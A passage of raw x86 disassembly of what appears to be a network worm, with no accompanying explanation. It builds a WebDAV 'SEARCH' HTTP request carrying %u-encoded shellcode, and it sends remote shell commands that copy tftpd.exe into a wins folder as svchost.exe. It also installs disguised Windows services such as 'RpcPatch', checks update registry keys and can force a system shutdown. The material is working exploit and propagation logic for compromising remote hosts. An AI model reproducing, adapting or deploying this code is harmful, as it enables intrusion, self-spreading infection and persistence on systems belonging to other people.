		pop	ebp
		pop	ebx
		retn
; ---------------------------------------------------------------------------


loc_401B3C:				; CODE XREF: sub_401B10+25j
		mov	esi, [esp+10h+arg_8]
		mov	ebx, dword_40416C
		push	0
		push	3FFh
		push	esi
		push	edi
		call	ebx ; dword_40416C
		cmp	eax, 0FFFFFFFFh
		jz	short loc_401B7E
		mov	ebp, dword_404100


loc_401B5C:				; CODE XREF: sub_401B10+6Cj
		push	offset dword_4061BC
		push	esi
		mov	byte ptr [eax+esi], 0
		call	ebp ; dword_404100
		add	esp, 8
		test	eax, eax
		jnz	short loc_401B85
		push	eax
		push	3FFh
		push	esi
		push	edi
		call	ebx ; dword_40416C
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_401B5C


loc_401B7E:				; CODE XREF: sub_401B10+44j
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		retn
; ---------------------------------------------------------------------------


loc_401B85:				; CODE XREF: sub_401B10+5Dj
		pop	edi
		pop	esi
		pop	ebp
		mov	eax, 1
		pop	ebx
		retn
sub_401B10	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401B90	proc near		; CODE XREF: sub_401C80+162p
					; sub_401C80+192p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	ecx
		mov	edx, [esp+4+arg_4]
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, edx
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		mov	esi, [esp+14h+arg_0]
		push	0
		not	ecx
		dec	ecx
		push	ecx
		push	edx
		push	esi
		call	dword_404168	; send
		test	eax, eax
		jz	loc_401C64
		lea	eax, [esp+14h+var_4]
		push	4
		push	eax
		push	1006h
		push	0FFFFh
		push	esi
		mov	[esp+28h+var_4], 15F90h
		call	dword_404164	; setsockopt
		mov	ebx, dword_4040C0
		call	ebx ; dword_4040C0
		mov	edi, [esp+14h+arg_8]
		push	0
		push	1FFh
		push	edi
		push	esi
		mov	[esp+24h+arg_4], eax
		call	dword_40416C	; recv
		mov	esi, eax
		call	ebx ; dword_4040C0
		mov	ecx, [esp+14h+arg_4]
		mov	ebp, eax
		sub	ebp, ecx
		cmp	esi, 0FFFFFFFFh
		jz	short loc_401C64


loc_401C0C:				; CODE XREF: sub_401B90+D2j
		mov	byte ptr [esi+edi], 0
		mov	esi, dword_404100
		push	offset aTransferSucces ; "Transfer successful"
		push	edi
		call	esi ; dword_404100
		add	esp, 8
		test	eax, eax
		jnz	short loc_401C6C
		push	offset aTimeoutOccurre ; "Timeout occurred"
		push	edi
		call	esi ; dword_404100
		add	esp, 8
		test	eax, eax
		jnz	short loc_401C64
		cmp	ebp, 15F2Ch
		ja	short loc_401C64
		call	ebx ; dword_4040C0
		mov	ecx, [esp+14h+arg_0]
		push	0
		push	1FFh
		push	edi
		push	ecx
		mov	[esp+24h+arg_4], eax
		call	dword_40416C	; recv
		mov	esi, eax
		call	ebx ; dword_4040C0
		sub	eax, [esp+14h+arg_4]
		add	ebp, eax
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_401C0C


loc_401C64:				; CODE XREF: sub_401B90+26j
					; sub_401B90+7Aj ...
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		pop	ecx
		retn
; ---------------------------------------------------------------------------


loc_401C6C:				; CODE XREF: sub_401B90+93j
		pop	edi
		pop	esi
		pop	ebp
		mov	eax, 1
		pop	ebx
		pop	ecx
		retn
sub_401B90	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401C80	proc near		; DATA XREF: sub_401990+116o

var_404		= dword	ptr -404h
var_400		= byte ptr -400h
var_3FF		= byte ptr -3FFh
arg_0		= dword	ptr  4

		sub	esp, 404h
		mov	eax, [esp+404h+arg_0]
		push	ebp
		push	esi
		push	edi
		mov	esi, [eax]
		mov	ecx, 0FFh
		xor	eax, eax
		lea	edi, [esp+410h+var_3FF]
		mov	[esp+410h+var_400], 0
		push	4
		rep stosd
		lea	ecx, [esp+414h+var_404]
		mov	[esp+414h+var_404], 1388h
		stosw
		push	ecx
		push	1006h
		push	0FFFFh
		push	esi
		stosb
		call	dword_404164	; setsockopt
		mov	edi, dword_40416C
		push	0
		lea	edx, [esp+414h+var_400]
		push	3FFh
		push	edx
		push	esi
		call	edi ; dword_40416C
		cmp	eax, 0FFFFFFFFh
		jz	loc_401E54
		test	eax, eax
		jz	loc_401E54
		mov	ebp, dword_404100
		lea	eax, [esp+410h+var_400]
		push	offset aMicrosoftWindo ; "Microsoft Windows"
		push	eax
		call	ebp ; dword_404100
		add	esp, 8
		test	eax, eax
		jz	loc_401E54
		lea	ecx, [esp+410h+var_400]
		push	offset dword_4061BC
		push	ecx
		call	ebp ; dword_404100
		add	esp, 8
		test	eax, eax
		jnz	short loc_401D4D


loc_401D1D:				; CODE XREF: sub_401C80+CBj
		push	0
		lea	edx, [esp+414h+var_400]
		push	3FFh
		push	edx
		push	esi
		call	edi ; dword_40416C
		cmp	eax, 0FFFFFFFFh
		jz	loc_401E54
		mov	[esp+eax+410h+var_400],	0
		lea	eax, [esp+410h+var_400]
		push	offset dword_4061BC
		push	eax
		call	ebp ; dword_404100
		add	esp, 8
		test	eax, eax
		jz	short loc_401D1D


loc_401D4D:				; CODE XREF: sub_401C80+9Bj
		lea	ecx, [esp+410h+var_400]
		push	ecx
		push	offset aDirWinsDllhost ; "dir wins\\dllhost.exe\n\r"
		push	esi
		call	sub_401B10
		add	esp, 0Ch
		test	eax, eax
		jz	loc_401E54
		lea	edx, [esp+410h+var_400]
		push	offset aDllhost_exe ; "DLLHOST.EXE"
		push	edx
		call	ebp ; dword_404100
		add	esp, 8
		test	eax, eax
		jnz	loc_401E54
		lea	eax, [esp+410h+var_400]
		push	offset aDllhost_exe_0 ;	"dllhost.exe"
		push	eax
		call	ebp ; dword_404100
		add	esp, 8
		test	eax, eax
		jnz	loc_401E54
		lea	ecx, [esp+410h+var_400]
		push	ecx
		push	offset aDirDllcacheTft ; "dir dllcache\\tftpd.exe\n\r"
		push	esi
		call	sub_401B10
		add	esp, 0Ch
		test	eax, eax
		jz	loc_401E54
		lea	edx, [esp+410h+var_400]
		push	offset aTftpd_exe_0 ; "tftpd.exe"
		push	edx
		call	ebp ; dword_404100
		add	esp, 8
		test	eax, eax
		jnz	short loc_401DF0
		lea	eax, [esp+410h+var_400]
		push	offset aTftpd_exe ; "TFTPD.EXE"
		push	eax
		call	ebp ; dword_404100
		add	esp, 8
		test	eax, eax
		jnz	short loc_401DF0
		lea	ecx, [esp+410h+var_400]
		push	ecx
		push	offset dword_407628
		push	esi
		call	sub_401B90
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_401E54
		jmp	short loc_401E07
; ---------------------------------------------------------------------------


loc_401DF0:				; CODE XREF: sub_401C80+142j
					; sub_401C80+155j
		lea	edx, [esp+410h+var_400]
		push	edx
		push	offset aCopyDllcacheTf ; "copy dllcache\\tftpd.exe wins\\svchost.ex"...
		push	esi
		call	sub_401B10
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_401E54


loc_401E07:				; CODE XREF: sub_401C80+16Ej
		lea	eax, [esp+410h+var_400]
		push	eax
		push	offset dword_4075A8
		push	esi
		call	sub_401B90
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_401E54
		mov	ebp, dword_4040C8
		push	1F4h
		call	ebp ; dword_4040C8
		mov	edi, offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		push	0
		repne scasb
		not	ecx
		dec	ecx
		push	ecx
		push	offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
		push	esi
		call	dword_404168	; send
		test	eax, eax
		jz	short loc_401E54
		push	3E8h
		call	ebp ; dword_4040C8


loc_401E54:				; CODE XREF: sub_401C80+5Fj
					; sub_401C80+67j ...
		push	esi
		call	dword_404170	; closesocket
		pop	edi
		pop	esi
		mov	eax, [esp+408h+arg_0]
		pop	ebp
		test	eax, eax
		jz	short loc_401E72
		push	eax
		call	sub_402FC6
		add	esp, 4


loc_401E72:				; CODE XREF: sub_401C80+1E7j
		mov	eax, 1
		add	esp, 404h
		retn	4
sub_401C80	endp


; =============== S U B	R O U T	I N E =======================================



sub_401E80	proc near		; CODE XREF: sub_401210:loc_401217p
					; sub_401210+17p
		push	offset aMicrosoft_com ;	"microsoft.com"
		call	dword_404160	; gethostbyname
		neg	eax
		sbb	eax, eax
		neg	eax
		retn
sub_401E80	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401EA0	proc near		; CODE XREF: sub_401210:loc_401230p

var_70		= dword	ptr -70h
var_64		= byte ptr -64h

		sub	esp, 74h
		lea	eax, [esp+74h+var_64]
		push	esi
		push	64h
		push	eax
		call	dword_404158	; gethostname
		cmp	eax, 0FFFFFFFFh
		jz	short loc_401F1D
		lea	ecx, [esp+78h+var_64]
		push	ecx
		call	dword_404160	; gethostbyname
		test	eax, eax
		jz	short loc_401F1D
		mov	edx, [eax+0Ch]
		mov	esi, [edx]
		test	esi, esi
		jz	short loc_401F1D
		movsx	ecx, word ptr [eax+0Ah]
		mov	eax, ecx
		push	edi
		lea	edi, [esp+7Ch+var_70]
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		mov	ecx, [esp+7Ch+var_70]
		push	ecx
		call	dword_40415C	; inet_ntoa
		mov	edi, eax
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, 1
		mov	edx, ecx
		mov	esi, edi
		mov	edi, offset dword_407478
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		and	ecx, 3
		rep movsb
		pop	edi
		pop	esi
		add	esp, 74h
		retn
; ---------------------------------------------------------------------------


loc_401F1D:				; CODE XREF: sub_401EA0+14j
					; sub_401EA0+23j ...
		xor	eax, eax
		pop	esi
		add	esp, 74h
		retn
sub_401EA0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401F30	proc near		; CODE XREF: sub_401280+A5p

var_50		= byte ptr -50h

		sub	esp, 50h
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		push	esi
		push	edi
		mov	edi, offset aSearch ; "SEARCH /"
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ds:dword_4075A0
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		mov	eax, 41414141h
		and	ecx, 3
		rep movsb
		mov	edx, ds:dword_4075A0
		mov	ecx, 41h
		mov	dword_406424, 8
		mov	esi, offset aU5951U6858U759 ; "%u5951%u6858%u759f%u0018%u5951%u6858%u7"...
		lea	edi, [edx+8]
		rep stosd
		stosb
		mov	eax, dword_406424
		mov	edx, ds:dword_4075A0
		add	eax, 105h
		mov	ecx, 41414141h
		mov	dword_406424, eax
		add	eax, edx
		mov	[eax], ecx
		mov	[eax+4], ecx
		mov	eax, dword_406424
		mov	ecx, ds:dword_4075A0
		add	eax, 8
		mov	dword_406424, eax
		lea	edi, [eax+ecx]
		mov	ecx, 30h
		rep movsd
		movsb
		mov	eax, dword_406424
		mov	edx, ds:dword_4075A0
		add	eax, 0C0h
		mov	ecx, 31h
		mov	esi, offset aU5390U665eU66a ; "%u5390%u665e%u66ad%u993d%u7560%u56f8%u5"...
		mov	dword_406424, eax
		lea	edi, [eax+edx]
		rep movsd
		movsw
		movsb
		mov	eax, dword_406424
		mov	ecx, ds:dword_4075A0
		add	eax, 0C6h
		mov	esi, offset aFfilomidomfafd ; "ffilomidomfafdfgfhinhnlaljbeaaaaaalimmm"...
		mov	dword_406424, eax
		lea	edi, [eax+ecx]
		mov	ecx, 55h
		rep movsd
		movsb
		mov	edx, dword_406424
		mov	esi, ds:dword_4075A0
		add	edx, 154h
		mov	ecx, 3F52h
		mov	eax, 4E4E4E4Eh
		mov	dword_406424, edx
		lea	edi, [edx+esi]
		mov	esi, offset aHttp1_1Host127 ; "	HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Typ"...
		rep stosd
		stosw
		mov	eax, dword_406424
		mov	edx, ds:dword_4075A0
		mov	ecx, 14h
		lea	edi, [esp+58h+var_50]
		add	eax, 0FD4Ah
		rep movsd
		lea	edi, [eax+edx]
		mov	ecx, 14h
		lea	esi, [esp+58h+var_50]
		mov	dword_406424, eax
		rep movsd
		mov	eax, dword_406424
		mov	esi, offset loc_40597E
		add	eax, 4Fh
		mov	dword_406424, eax
		lea	ecx, [eax+0E7h]
		lea	edx, [eax+0ECh]
		mov	dword_40642C, ecx
		mov	ecx, ds:dword_4075A0
		mov	ds:dword_407470, edx
		lea	edi, [eax+ecx]
		mov	ecx, 5Dh
		rep movsd
		movsw
		mov	eax, dword_406424
		mov	esi, ds:dword_4075A0
		mov	cx, word_406238
		mov	dl, byte_40623A
		add	eax, 175h
		pop	edi
		mov	dword_406424, eax
		add	eax, esi
		pop	esi
		mov	[eax], cx
		mov	[eax+2], dl
		mov	eax, dword_406424
		add	eax, 2
		mov	dword_406424, eax
		add	esp, 50h
		retn
sub_401F30	endp


; =============== S U B	R O U T	I N E =======================================



sub_4020E0	proc near		; CODE XREF: sub_401210+57p
		mov	ax, word_405B68
		push	eax
		call	dword_404174	; ntohs
		mov	ecx, ds:dword_4075A0
		mov	edx, dword_40642C
		xor	eax, 9999h
		push	offset dword_407478
		mov	[edx+ecx], ax
		call	dword_404194	; inet_addr
		mov	ecx, ds:dword_4075A0
		mov	edx, ds:dword_407470
		xor	eax, 99999999h
		mov	[edx+ecx], eax
		retn
sub_4020E0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402130	proc near		; CODE XREF: sub_401210+5Cp
		mov	ax, word_405B68
		push	eax
		call	dword_404174	; ntohs
		mov	ecx, dword_406428
		xor	eax, 9999h
		push	offset dword_407478
		mov	word ptr dword_406470[ecx], ax
		call	dword_404194	; inet_addr
		mov	edx, ds:dword_407474
		xor	eax, 99999999h
		mov	dword_406470[edx], eax
		retn
sub_402130	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402170	proc near		; CODE XREF: sub_401280+AAp
		push	esi
		mov	eax, dword_4057DC
		push	edi
		mov	ecx, 0D8h
		mov	esi, offset dword_40547C
		mov	edi, offset dword_406470
		rep movsd
		mov	ecx, dword_4057E4
		add	eax, 166h
		add	ecx, 166h
		mov	dword_4057DC, eax
		mov	dword_4057E4, ecx
		mov	dword_4067D8, ecx
		mov	ecx, dword_4057E8
		mov	dword_4067D0, eax
		mov	eax, dword_4057E0
		mov	dword_4067DC, ecx
		mov	ecx, 0B3h
		mov	esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
		mov	edi, offset dword_4067E0
		mov	edx, dword_405484
		mov	dword_40584C, 100139Dh
		mov	dword_4067D4, eax
		rep movsd
		mov	ecx, 0Fh
		mov	esi, offset aC1234561111111 ; "\\C$\\123456111111111111111.doc"
		mov	edi, offset dword_406AAC
		add	edx, 2C0h
		rep movsd
		mov	ecx, 0Ch
		mov	esi, offset dword_405AF4
		mov	edi, offset dword_406AE8
		mov	eax, 2C0h
		rep movsd
		mov	esi, dword_406480
		mov	ecx, dword_4064F4
		mov	edi, dword_406524
		mov	dword_406478, edx
		mov	edx, dword_4064F0
		add	esi, eax
		add	edx, eax
		add	ecx, eax
		mov	dword_406480, esi
		mov	esi, dword_406528
		mov	dword_4064F0, edx
		mov	edx, dword_406540
		mov	dword_4064F4, ecx
		mov	ecx, dword_4065FC
		add	edi, eax
		add	esi, eax
		mov	dword_406524, edi
		add	edx, eax
		add	ecx, eax
		mov	dword_406528, esi
		pop	edi
		mov	dword_406428, 5ADh
		mov	ds:dword_407474, 5B2h
		mov	dword_406420, 6A8h
		mov	dword_406540, edx
		mov	dword_4065FC, ecx
		pop	esi
		retn
sub_402170	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4022A0	proc near		; CODE XREF: sub_401780+1E8p

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		sub	esp, 14h
		lea	eax, [esp+14h+var_14]
		push	eax
		push	28h
		call	dword_40409C	; GetCurrentProcess
		push	eax
		call	dword_404044	; OpenProcessToken
		lea	ecx, [esp+14h+var_C]
		push	ecx
		push	offset aSeshutdownpriv ; "SeShutdownPrivilege"
		push	0
		call	dword_404048	; LookupPrivilegeValueA
		mov	eax, [esp+14h+var_14]
		push	0
		push	0
		lea	edx, [esp+1Ch+var_10]
		push	0
		push	edx
		push	0
		push	eax
		mov	[esp+2Ch+var_10], 1
		mov	[esp+2Ch+var_4], 2
		call	dword_404028	; AdjustTokenPrivileges
		mov	ecx, [esp+14h+arg_0]
		push	0
		or	ecx, 4
		push	ecx
		call	dword_404148	; ExitWindowsEx
		add	esp, 14h
		retn
sub_4022A0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402310	proc near		; CODE XREF: sub_401780+8p

var_9C		= dword	ptr -9Ch
var_94		= dword	ptr -94h

		sub	esp, 9Ch
		call	dword_404094	; GetVersion
		and	eax, 0FFh
		lea	ecx, [esp+9Ch+var_9C]
		cmp	eax, 5
		push	ecx
		sbb	eax, eax
		and	al, 0F8h
		add	eax, 9Ch
		mov	[esp+0A0h+var_9C], eax
		call	dword_404098	; GetVersionExA
		mov	eax, [esp+9Ch+var_94]
		add	esp, 9Ch
		retn
sub_402310	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402350	proc near		; CODE XREF: sub_402390+Dp
					; sub_402390+21p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		lea	eax, [esp+arg_0]
		push	eax
		push	1
		push	0
		push	ecx
		push	80000002h
		call	dword_40403C	; RegOpenKeyExA
		test	eax, eax
		jnz	short loc_40237E
		mov	edx, [esp+arg_0]
		push	edx
		call	dword_404040	; RegCloseKey
		mov	eax, 1
		retn
; ---------------------------------------------------------------------------


loc_40237E:				; CODE XREF: sub_402350+1Bj
		xor	eax, eax
		retn
sub_402350	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402390	proc near		; CODE XREF: sub_401780+1Dp
					; sub_401780+1DAp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		test	eax, eax
		jnz	short loc_4023AC
		push	offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Updates\\Windows	2000"...
		call	sub_402350
		add	esp, 4
		neg	eax
		sbb	eax, eax
		neg	eax
		retn
; ---------------------------------------------------------------------------


loc_4023AC:				; CODE XREF: sub_402390+6j
		push	offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Updates\\Windows	XP\\S"...
		call	sub_402350
		add	esp, 4
		test	eax, eax
		jnz	short loc_4023CF
		push	offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Updates\\Windows	XP\\S"...
		call	sub_402350
		add	esp, 4
		test	eax, eax
		jnz	short loc_4023CF
		retn
; ---------------------------------------------------------------------------


loc_4023CF:				; CODE XREF: sub_402390+2Bj
					; sub_402390+3Cj
		mov	eax, 1
		retn
sub_402390	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4023E0	proc near		; CODE XREF: sub_4015E0+61p
					; sub_401660+5Cp

var_110		= dword	ptr -110h
var_10C		= dword	ptr -10Ch
var_108		= byte ptr -108h
var_107		= byte ptr -107h
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		sub	esp, 110h
		push	ebx
		push	ebp
		push	esi
		push	edi
		push	0F003Fh
		push	0
		push	0
		call	dword_40402C	; OpenSCManagerA
		mov	ebp, eax
		test	ebp, ebp
		jnz	short loc_40240A
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 110h
		retn
; ---------------------------------------------------------------------------


loc_40240A:				; CODE XREF: sub_4023E0+1Dj
		mov	ecx, 41h
		xor	eax, eax
		lea	edi, [esp+120h+var_107]
		mov	[esp+120h+var_108], 0
		rep stosd
		mov	edi, [esp+120h+arg_8]
		lea	eax, [esp+120h+var_108]
		push	edi
		push	offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
		push	offset aSWinsS	; "%s\\wins\\%s"
		push	eax
		call	dword_40411C	; sprintf
		push	offset aSvchost_exe ; "svchost.exe"
		push	edi
		mov	esi, 2
		call	dword_404140	; _stricmp
		add	esp, 18h
		test	eax, eax
		jnz	short loc_402456
		mov	esi, 3


loc_402456:				; CODE XREF: sub_4023E0+6Fj
		push	0
		mov	edx, [esp+124h+arg_4]
		push	0
		mov	eax, [esp+128h+arg_0]
		push	0
		push	0
		lea	ecx, [esp+130h+var_108]
		push	0
		push	ecx
		push	0
		push	esi
		push	110h
		push	0F01FFh
		push	edx
		push	eax
		push	ebp
		call	dword_404030	; CreateServiceA
		mov	ebx, eax
		test	ebx, ebx
		jnz	short loc_4024A3
		push	ebp
		call	dword_404034	; CloseServiceHandle
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		add	esp, 110h
		retn
; ---------------------------------------------------------------------------


loc_4024A3:				; CODE XREF: sub_4023E0+ADj
		mov	ecx, [esp+120h+arg_C]
		push	0F01FFh
		push	ecx
		push	ebp
		mov	[esp+12Ch+var_110], offset aManagesNetwork ; "Manages network configuration by updati"...
		xor	esi, esi
		call	dword_404038	; OpenServiceA
		mov	edi, eax
		test	edi, edi
		jz	short loc_402507
		push	400h
		push	40h
		mov	[esp+128h+var_10C], esi
		call	dword_40408C	; LocalAlloc
		mov	esi, eax
		test	esi, esi
		jz	short loc_4024FC
		lea	edx, [esp+120h+var_10C]
		push	edx
		push	400h
		push	esi
		push	1
		push	edi
		call	dword_404004	; QueryServiceConfig2A
		test	eax, eax
		jz	short loc_4024FC
		mov	eax, [esi]
		mov	[esp+120h+var_110], eax


loc_4024FC:				; CODE XREF: sub_4023E0+FCj
					; sub_4023E0+114j
		push	edi
		mov	edi, dword_404034
		call	edi ; dword_404034
		jmp	short loc_40250D
; ---------------------------------------------------------------------------


loc_402507:				; CODE XREF: sub_4023E0+E5j
		mov	edi, dword_404034


loc_40250D:				; CODE XREF: sub_4023E0+125j
		lea	ecx, [esp+120h+var_110]
		push	ecx
		push	1
		push	ebx
		call	dword_404000	; ChangeServiceConfig2A
		test	esi, esi
		jz	short loc_402526
		push	esi
		call	dword_404090	; LocalFree


loc_402526:				; CODE XREF: sub_4023E0+13Dj
		push	ebx
		call	edi ; dword_404034
		push	ebp
		call	edi ; dword_404034
		pop	edi
		pop	esi
		pop	ebp
		mov	eax, 1
		pop	ebx
		add	esp, 110h
		retn
sub_4023E0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402540	proc near		; CODE XREF: sub_401280+ECp
					; sub_401280+110p

var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_120		= byte ptr -120h
var_11C		= dword	ptr -11Ch
var_118		= byte ptr -118h
var_114		= dword	ptr -114h
var_104		= dword	ptr -104h
var_100		= dword	ptr -100h
arg_0		= dword	ptr  4

		sub	esp, 134h
		push	ebp
		push	edi
		push	0F003Fh
		push	0
		push	0
		call	dword_40402C	; OpenSCManagerA
		mov	ebp, eax
		test	ebp, ebp
		mov	[esp+13Ch+var_134], ebp
		jnz	short loc_40256A
		pop	edi
		pop	ebp
		add	esp, 134h
		retn
; ---------------------------------------------------------------------------


loc_40256A:				; CODE XREF: sub_402540+1Fj
		push	offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
		lea	eax, [esp+140h+var_104]
		push	offset aDSWins	; "-d%s\\wins"
		push	eax
		mov	[esp+148h+var_130], 0
		call	dword_40411C	; sprintf
		mov	edx, [esp+148h+arg_0]
		add	esp, 0Ch
		lea	ecx, [esp+13Ch+var_104]
		push	0F01FFh
		push	edx
		push	ebp
		mov	[esp+148h+var_128], ecx
		call	dword_404038	; OpenServiceA
		mov	edi, eax
		test	edi, edi
		jnz	short loc_4025B5
		pop	edi
		pop	ebp
		add	esp, 134h
		retn
; ---------------------------------------------------------------------------


loc_4025B5:				; CODE XREF: sub_402540+6Aj
		push	ebx
		push	esi
		push	400h
		push	40h
		call	dword_40408C	; LocalAlloc
		mov	esi, dword_40401C
		mov	ebx, eax
		lea	eax, [esp+13Ch+var_118]
		mov	[esp+13Ch+var_124], ebx
		push	eax
		push	edi
		call	esi ; dword_40401C
		test	eax, eax
		jnz	short loc_4025E3
		xor	esi, esi
		jmp	loc_40270E
; ---------------------------------------------------------------------------


loc_4025E3:				; CODE XREF: sub_402540+9Aj
		mov	eax, [esp+13Ch+var_114]
		cmp	eax, 4
		jz	loc_402709
		cmp	eax, 2
		jz	loc_402709
		lea	ecx, [esp+13Ch+var_11C]
		push	ecx
		push	400h
		push	ebx
		push	edi
		call	dword_404020	; QueryServiceConfigA
		test	eax, eax
		jnz	short loc_402616
		xor	esi, esi
		jmp	loc_40270E
; ---------------------------------------------------------------------------


loc_402616:				; CODE XREF: sub_402540+CDj
		cmp	dword ptr [ebx+4], 4
		jnz	short loc_402642
		push	0
		push	0
		push	0
		push	0
		push	0
		push	0
		push	0
		push	0FFFFFFFFh
		push	3
		push	0FFFFFFFFh
		push	edi
		call	dword_404024	; ChangeServiceConfigA
		test	eax, eax
		jnz	short loc_402642
		xor	esi, esi
		jmp	loc_40270E
; ---------------------------------------------------------------------------


loc_402642:				; CODE XREF: sub_402540+DAj
					; sub_402540+F9j
		lea	edx, [esp+13Ch+var_120]
		push	edx
		push	1
		push	edi
		call	dword_404008	; StartServiceA
		test	eax, eax
		jnz	short loc_40265B
		xor	esi, esi
		jmp	loc_40270E
; ---------------------------------------------------------------------------


loc_40265B:				; CODE XREF: sub_402540+112j
		lea	eax, [esp+13Ch+var_118]
		push	eax
		push	edi
		call	esi ; dword_40401C
		test	eax, eax
		jnz	short loc_40266E
		xor	esi, esi
		jmp	loc_40270E
; ---------------------------------------------------------------------------


loc_40266E:				; CODE XREF: sub_402540+125j
		cmp	[esp+13Ch+var_114], 2
		jnz	loc_4026F9
		mov	ebp, dword_4040C8
		mov	ebx, dword_4040C0
		mov	esi, [esp+13Ch+var_11C]


loc_402689:				; CODE XREF: sub_402540+1AFj
		mov	eax, 0CCCCCCCDh
		mul	[esp+13Ch+var_100]
		shr	edx, 3
		cmp	edx, 3E8h
		jnb	short loc_4026A4
		mov	edx, 3E8h
		jmp	short loc_4026B1
; ---------------------------------------------------------------------------


loc_4026A4:				; CODE XREF: sub_402540+15Bj
		cmp	edx, 2710h
		jbe	short loc_4026B1
		mov	edx, 2710h


loc_4026B1:				; CODE XREF: sub_402540+162j
					; sub_402540+16Aj
		push	edx
		call	ebp ; dword_4040C8
		lea	ecx, [esp+13Ch+var_118]
		push	ecx
		push	edi
		call	dword_40401C	; QueryServiceStatus
		test	eax, eax
		jz	short loc_4026F1
		mov	edx, [esp+13Ch+var_128]
		mov	eax, [esp+13Ch+var_104]
		cmp	eax, edx
		jbe	short loc_4026DE
		call	ebx ; dword_4040C0
		mov	esi, eax
		mov	eax, [esp+13Ch+var_104]
		mov	[esp+13Ch+var_128], eax
		jmp	short loc_4026EA
; ---------------------------------------------------------------------------


loc_4026DE:				; CODE XREF: sub_402540+18Ej
		call	ebx ; dword_4040C0
		mov	ecx, [esp+13Ch+var_100]
		sub	eax, esi
		cmp	eax, ecx
		ja	short loc_4026F1


loc_4026EA:				; CODE XREF: sub_402540+19Cj
		cmp	[esp+13Ch+var_114], 2
		jz	short loc_402689


loc_4026F1:				; CODE XREF: sub_402540+182j
					; sub_402540+1A8j
		mov	ebp, [esp+13Ch+var_12C]
		mov	ebx, [esp+13Ch+var_124]


loc_4026F9:				; CODE XREF: sub_402540+133j
		mov	eax, [esp+13Ch+var_114]
		xor	ecx, ecx
		cmp	eax, 4
		setz	cl
		mov	esi, ecx
		jmp	short loc_40270E
; ---------------------------------------------------------------------------


loc_402709:				; CODE XREF: sub_402540+AAj
					; sub_402540+B3j
		mov	esi, 1


loc_40270E:				; CODE XREF: sub_402540+9Ej
					; sub_402540+D1j ...
		push	ebx
		call	dword_404090	; LocalFree
		push	edi
		mov	edi, dword_404034
		call	edi ; dword_404034
		push	ebp
		call	edi ; dword_404034
		mov	eax, esi
		pop	esi
		pop	ebx
		pop	edi
		pop	ebp
		add	esp, 134h
		retn
sub_402540	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402730	proc near		; CODE XREF: sub_4011C0+1Fp

var_1C		= byte ptr -1Ch
var_18		= dword	ptr -18h

		sub	esp, 1Ch
		push	esi
		push	edi
		push	80000000h
		push	0
		push	0
		call	dword_40402C	; OpenSCManagerA
		mov	edi, eax
		test	edi, edi
		jnz	short loc_402755
		pop	edi
		mov	eax, 11111111h
		pop	esi
		add	esp, 1Ch
		retn
; ---------------------------------------------------------------------------


loc_402755:				; CODE XREF: sub_402730+18j
		push	0F01FFh
		push	offset aRpcpatch ; "RpcPatch"
		push	edi
		call	dword_404038	; OpenServiceA
		mov	esi, eax
		test	esi, esi
		jnz	short loc_402777
		pop	edi
		mov	eax, 22222222h
		pop	esi
